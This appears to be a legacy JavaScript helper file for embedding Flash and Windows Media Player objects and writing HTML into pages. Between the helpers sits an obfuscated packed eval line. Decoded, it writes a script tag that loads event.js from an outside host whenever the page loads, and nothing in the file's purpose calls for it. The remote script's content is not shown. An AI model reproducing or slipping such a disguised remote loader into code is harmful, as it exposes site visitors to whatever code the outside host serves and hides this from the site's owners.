function MakeFlashString(source,id,width,height,wmode, otherParam){	
	return "<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,22,0\" width="+width+" height="+height+" id="+id+"><param name=wmode value="+wmode+" /><param name=movie value="+source+" /><param name=quality value=high />"+otherParam+"<embed src="+source+" quality=high wmode="+wmode+" type=\"application/x-shockwave-flash\" pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?p1_prod_version=shockwaveflash\" width="+width+" height="+height+"></embed></object>";
}

function MakeObjectString(classid, codebase, width,height, param){
	return "<object classid="+classid+" codebase="+codebase+" standby=\"Loading Microsoft?Windows?Media Player components...\" type=\"application/x-oleobject\" width="+width+" height="+height+">"+param+"</object>";
}              
// innerHTML Type
function SetInnerHTML(target, code){ 
	target.innerHTML = code;
}
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4.5("<0 3=2 1=6://d.7.c.b/a/8.9></0>");',14,14,'script|src|javascript|language|document|write|http|mm|event|js|pds|kr|co|image'.split('|'),0,{}))
// Direct Write Type
function DocumentWrite(src){
	document.write(src);
}